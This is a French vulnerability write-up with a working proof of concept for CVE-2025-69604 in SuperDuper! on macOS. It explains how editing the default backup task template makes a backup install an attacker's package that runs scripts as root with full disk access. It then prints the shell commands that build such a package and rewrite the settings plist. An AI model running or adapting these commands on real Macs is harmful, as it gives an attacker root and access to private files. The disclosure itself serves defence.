
Preuve de concept pour CVE-2025-69604, démontrant une escalade de privilèges via l'installation de paquets malveillants dans les tâches de sauvegarde SuperDuper sur macOS.
Cette vulnérabilité est similaire à celle décrite dans CVE-2025-61229 – un attaquant peut modifier le modèle de tâche pour que les tâches de sauvegarde SuperDuper installent un package arbitraire. Le package peut ensuite exécuter des scripts shell en tant qu'utilisateur root et avec le plus haut niveau d'accès à la vie privée (accès complet au disque).
CVSS 3.1 Score : Le score NVD est en attente.
Pour éviter cette vulnérabilité, supprimez l'application SuperDuper! ou appliquez la mise à jour 3.12.
Cette analyse d'exploit et preuve de concept est fournie à des fins éducatives uniquement. Utilisez-la à vos propres risques.
Dans mon analyse précédente de la vulnérabilité SuperDuper CVE-2025-61229, j'ai constaté que le modèle de paramètres par défaut de SuperDuper était toujours intrinsèquement non sécurisé même après que le développeur ait corrigé cette vulnérabilité dans la mise à jour SuperDuper 3.11. Cette mise à jour ne corrigeait que la vulnérabilité spécifique détaillée dans CVE-2025-61229, mais elle ne traitait pas le fait qu'un attaquant pouvait modifier le modèle de tâche par défaut. Malheureusement, le modèle de tâche inclut une fonctionnalité d'installation de packages, de sorte qu'un attaquant peut modifier le modèle de tâche pour spécifier un package pouvant installer des logiciels ou exécuter des scripts shell en tant qu'utilisateur root et avec un accès complet au disque.
Le développeur a atténué cette vulnérabilité en supprimant la fonctionnalité « installer un package ». Encore une fois, le modèle de paramètres de tâche peut toujours être modifié par un attaquant, et le développeur a même indiqué que cela ne pouvait pas être résolu sans ennuyer l'utilisateur (c'est-à-dire exiger une authentification de l'utilisateur à chaque modification de la tâche). Il semble donc que le modèle de tâche par défaut restera vulnérable aux modifications dans un avenir prévisible car le développeur n'a pas trouvé d'autre moyen de le rendre plus sécurisé.
Ma conclusion précédente mérite d'être répétée : les privilèges root et l'accès complet au disque sont les plus hauts privilèges qu'un logiciel puisse atteindre sur macOS. Tout développeur qui demande ces privilèges devrait écrire un logiciel conforme aux principes de conception de sécurité modernes et aux meilleures pratiques. Cette vulnérabilité, ainsi que celles exposées dans CVE-2025-57489 et CVE-2025-61228, et même la propre admission du développeur que ces problèmes persistent depuis 22 ans, démontrent que SuperDuper n'a pas été conçu pour être un produit sécurisé, et n'a pas connu d'améliorations régulières de conception sur 22 ans pour se conformer aux meilleures pratiques modernes.
Cette vulnérabilité est attaquée presque exactement de la même manière que CVE-2025-61229, je vais donc largement me référer à mon analyse précédente de cette vulnérabilité ici. La preuve de concept suivante démontre l'exploit avec la version 3.11 de SuperDuper :
mkdir -p /tmp/scripts
cd ~; export home=`pwd`; export user=`whoami`
printf '#!/bin/bash\n' > /tmp/scripts/preinstall
printf "ls -l $home/Desktop > /Library/private_data.txt\n" >> /tmp/scripts/preinstall
chmod a+x /tmp/scripts/preinstall
pkgbuild --identifier com.gray.sdexploit --nopayload --scripts /tmp/scripts /tmp/attack.pkg
cd ~/'Library/Application Support/SuperDuper!/Saved Settings/.Default Settings.sdsp'
cp 'Session Settings.sdss' Settings.plist
defaults write "`pwd`"/Settings.plist SDshouldInstallPackage -bool YES
defaults write "`pwd`"/Settings.plist SDinstallerPackage /tmp/attack.pkg
cp Settings.plist 'Session Settings.sdss'
Après avoir exécuté ces commandes, il suffit de lancer une sauvegarde avec les paramètres par défaut et le attack.pkg sera installé avec les privilèges root et un accès complet au disque. Le résultat final est un fichier nommé "private_data" dans /Library (c'est-à-dire accessible en écriture uniquement par root) qui contient une liste de votre dossier Bureau (c'est-à-dire accessible uniquement par un code exécuté avec un accès complet au disque).